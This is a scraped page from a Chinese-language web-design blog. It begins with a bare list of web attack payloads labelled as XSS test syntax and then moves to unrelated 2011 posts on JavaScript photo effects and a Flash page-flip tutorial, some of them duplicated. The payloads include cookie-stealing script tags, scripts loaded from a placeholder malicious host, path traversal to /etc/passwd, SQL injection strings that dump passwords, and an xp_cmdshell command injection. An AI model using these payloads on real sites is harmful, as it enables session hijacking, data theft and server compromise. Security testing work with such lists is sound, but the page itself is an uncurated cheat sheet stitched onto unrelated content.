Source: 不詳
><script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E
<script>alert('XSS')</script>
<img src="javascript:alert('XSS')">
%0a%0a<script>alert(\"Vulnerable\")</script>.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
<script>alert('Vulnerable');</script>
<script>alert('Vulnerable')</script>
?sql_debug=1
a%5c.aspx
a.jsp/<script>alert('Vulnerable')</script>
a?<script>alert('Vulnerable')</script>
"><script>alert('Vulnerable')</script>
';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID= 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
'';!--"<XSS>=&{()}
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert("XSS")>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="javascript:alert('XSS');">
"<IMG SRC=java\0script:alert(\"XSS\")>";' > out
<IMG SRC=" javascript:alert('XSS');">
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<BGSOUND SRC="javascript:alert('XSS');">
<br size="&{alert('XSS')}">
<LAYER SRC="http://惡意網址/a.js"></layer>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<IFRAME SRC=javascript:alert('XSS')></IFRAME>
<FRAMESET><FRAME SRC=javascript:alert('XSS')></FRAME></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="behaviour: url('http://惡意網址/exploit.html');">
<DIV STYLE="width: expression(alert('XSS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE='xss:expre\ssion(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<BASE HREF="javascript:alert('XSS');//">
getURL("javascript:alert('XSS')")
a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
<XML SRC="javascript:alert('XSS');">
"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
<SCRIPT SRC="http://惡意網址/xss.jpg"></SCRIPT>
<IMG SRC="javascript:alert('XSS')"
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://惡意網址/a.js></SCRIPT>'"-->
<IMG SRC="http://惡意網址/somecommand.php?somevariables=maliciouscode">
<SCRIPT a=">" SRC="http://惡意網址/a.js"></SCRIPT>
<SCRIPT =">" SRC="http://惡意網址/a.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://惡意網址/a.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://惡意網址/a.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://惡意網址/a.js"></SCRIPT>
<A HREF=http://惡意網址/>link</A>
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="aXSS測試語法><script>alert(document.cookie)</script>
2014年5月18日 星期日
2014年5月15日 星期四
2011年11月10日 星期四
在網頁中套用照片顯示的特效
在網頁設計領域中,照片的顯示方式一直都有新的突破,從早期簡單的圖片,自行製作網頁,到一些軟體協助產生相簿的網頁,到目前流行採用雲端的相簿連結方式,讓網頁設計人員需要經常涉獵不同的方法,以配合當時的.....流行或習慣。
以下介紹的是利用完成度較高,且彈性又大的一些方法,主要是採用已經完成的部份程式,結合到自己的網頁,這樣做的好處是可以維持原本美工設計的風格,也不會隨雲端系統的改換而出現無法控制的廣告或版面不合等狀況,非常適合網頁設計人員使用。
主要的技術大致有 Javascript、JQuery、Flash及HTML5,挑出幾個具有代表性的資源。
1. 採用單純的 Javascript 技術
2. 使用 JQuery 技術
3. 使用 Flash 技術
4. 使用 HTML5 等技術
更多的資料,未來會持續性地加以補充。
以下介紹的是利用完成度較高,且彈性又大的一些方法,主要是採用已經完成的部份程式,結合到自己的網頁,這樣做的好處是可以維持原本美工設計的風格,也不會隨雲端系統的改換而出現無法控制的廣告或版面不合等狀況,非常適合網頁設計人員使用。
主要的技術大致有 Javascript、JQuery、Flash及HTML5,挑出幾個具有代表性的資源。
1. 採用單純的 Javascript 技術
2. 使用 JQuery 技術
3. 使用 Flash 技術
4. 使用 HTML5 等技術
更多的資料,未來會持續性地加以補充。
2011年11月8日 星期二
書籍翻頁之網頁製作 - Flash Page Flip
這裡介紹一款書籍翻頁效果的網頁,來自 http://www.flashpageflip.com/ 網站。其中的免費版本既方便又實用 (而且我覺得比專業版好太多了),效果不錯,製作方式也非常簡單,可在 http://www.flashpageflip.com/FreeFPF.asp
解說前先參考它的完成範例:
(1) 官方網站提供的範例
(2) 測試練習製作的範例
(有時似乎要再按一次 Reload 重整才會顯現?!)
在開始製作前,最好先確認要製成的尺寸大小,且是僅就書籍的部份。例如想要的書面大小是寬368、高450的解析度,即單一頁面是 368x450,而攤開後的頁面則是 736x450 的解析度,所以各個頁面的尺寸就以這個大小來準備。
(1) 封面頁為單一頁面,368x450
(2) 攤開後其實為兩頁,若需要全幅的畫面,則應採用 736x450 的圖,裁切成兩張獨立的圖。
(3) 之後每個攤開的頁面均依此類推
(4) 封底頁為單一頁面,368x450
全幅的說明如下圖所示:
有這樣的觀念後,製作便簡單了,分別把各頁面的圖檔整理好,最好加上有規律的檔名。接著,把網頁相關檔案取出,而所有的圖檔置於 pages 資料夾內。
xml 裡的 Pages.xml 檔案是設定各頁面對應的圖檔。特別注意第一列有解析度的設定。
如此便完成了翻書網頁的製作。
此一免費版本其實還提供了以 .swf 檔案做為書頁的功能,因此於 flash 製作時必須先指定寬高,注意為單頁的尺寸,故無法用全幅的方式做 flash 動畫,不過官方網站的範例,巧妙地利用左圖、右flash的方式,製作出一個效果頗佳的頁面。同時該範例也有目錄頁,亦為使用 flash 各別製作,不過原始的 flash 檔案有附在壓縮檔內,可以參考。
提供的翻頁範例是全畫面的,如果想要限制在指定的區域內,加入 div 圖層有效。但上下的選項按鈕及官方商標文字則會保留。
網路上也有非常詳細的解說可以參考,列舉一二如下:
解說前先參考它的完成範例:
(1) 官方網站提供的範例
(2) 測試練習製作的範例
(有時似乎要再按一次 Reload 重整才會顯現?!)
在開始製作前,最好先確認要製成的尺寸大小,且是僅就書籍的部份。例如想要的書面大小是寬368、高450的解析度,即單一頁面是 368x450,而攤開後的頁面則是 736x450 的解析度,所以各個頁面的尺寸就以這個大小來準備。
(1) 封面頁為單一頁面,368x450
(2) 攤開後其實為兩頁,若需要全幅的畫面,則應採用 736x450 的圖,裁切成兩張獨立的圖。
(3) 之後每個攤開的頁面均依此類推
(4) 封底頁為單一頁面,368x450
全幅的說明如下圖所示:
原本尺寸為 736x450 的一張圖檔
裁切成兩張 368x450 的圖,各別存檔
有這樣的觀念後,製作便簡單了,分別把各頁面的圖檔整理好,最好加上有規律的檔名。接著,把網頁相關檔案取出,而所有的圖檔置於 pages 資料夾內。
xml 裡的 Pages.xml 檔案是設定各頁面對應的圖檔。特別注意第一列有解析度的設定。
如此便完成了翻書網頁的製作。
此一免費版本其實還提供了以 .swf 檔案做為書頁的功能,因此於 flash 製作時必須先指定寬高,注意為單頁的尺寸,故無法用全幅的方式做 flash 動畫,不過官方網站的範例,巧妙地利用左圖、右flash的方式,製作出一個效果頗佳的頁面。同時該範例也有目錄頁,亦為使用 flash 各別製作,不過原始的 flash 檔案有附在壓縮檔內,可以參考。
提供的翻頁範例是全畫面的,如果想要限制在指定的區域內,加入 div 圖層有效。但上下的選項按鈕及官方商標文字則會保留。
- 參考範例如:限定在網頁某區域內的範例
網路上也有非常詳細的解說可以參考,列舉一二如下:
2011年11月5日 星期六
圖片特效教學 (10js-2)
標籤:
教學,
照片特效,
網頁,
javascript
圖片特效教學 (10js-1)
《Javascript 的圖形特效》一文中的第一種特效如下:
此為採用單純的 javascript 所製作出的特效,且所有顯示的圖片均集中寫在 html 部份,很容易更換為自己想要的圖片。步驟為:
(1) 先準備好數張圖片 (下圖為原先展示的範例圖檔,要區分出有5個不是)
此為採用單純的 javascript 所製作出的特效,且所有顯示的圖片均集中寫在 html 部份,很容易更換為自己想要的圖片。步驟為:
(1) 先準備好數張圖片 (下圖為原先展示的範例圖檔,要區分出有5個不是)
(2) 修改編頁中圖片的部分
(3) 如果想要包覆在自己指定的圖層 div 中亦可
(4) 如下示範
預祝順利!
標籤:
教學,
照片特效,
網頁,
javascript
2011年11月4日 星期五
Javascript的照片特效
這算是非常古老的一組資料,年代來源已不可考,用Google搜尋『10款讓你震撼的圖片展示js代碼』,也是滿坑滿谷的複製轉貼內容。
不過就這幾款的效果而言,仍然很有特色,最主要在於它是利用純粹javascript寫成,而且將圖檔定義與程式有效分離的做法,很值得做為入門的學習。要學習的倒不是它的程式如何寫成,而是如何將該效果引用到自己的網頁上。
以下貼上它的預覽圖片,點取下方連結亦可直接查看預覽頁面:
檔案下載:這裡
參考來源:早期是由 zcool 網站發現,但該網站也是轉貼自其他來源,已不詳
不過就這幾款的效果而言,仍然很有特色,最主要在於它是利用純粹javascript寫成,而且將圖檔定義與程式有效分離的做法,很值得做為入門的學習。要學習的倒不是它的程式如何寫成,而是如何將該效果引用到自己的網頁上。
以下貼上它的預覽圖片,點取下方連結亦可直接查看預覽頁面:
(本站教學)
檔案下載:這裡
參考來源:早期是由 zcool 網站發現,但該網站也是轉貼自其他來源,已不詳
標籤:
照片特效,
資源收集,
網頁,
javascript
訂閱:
文章 (Atom)




















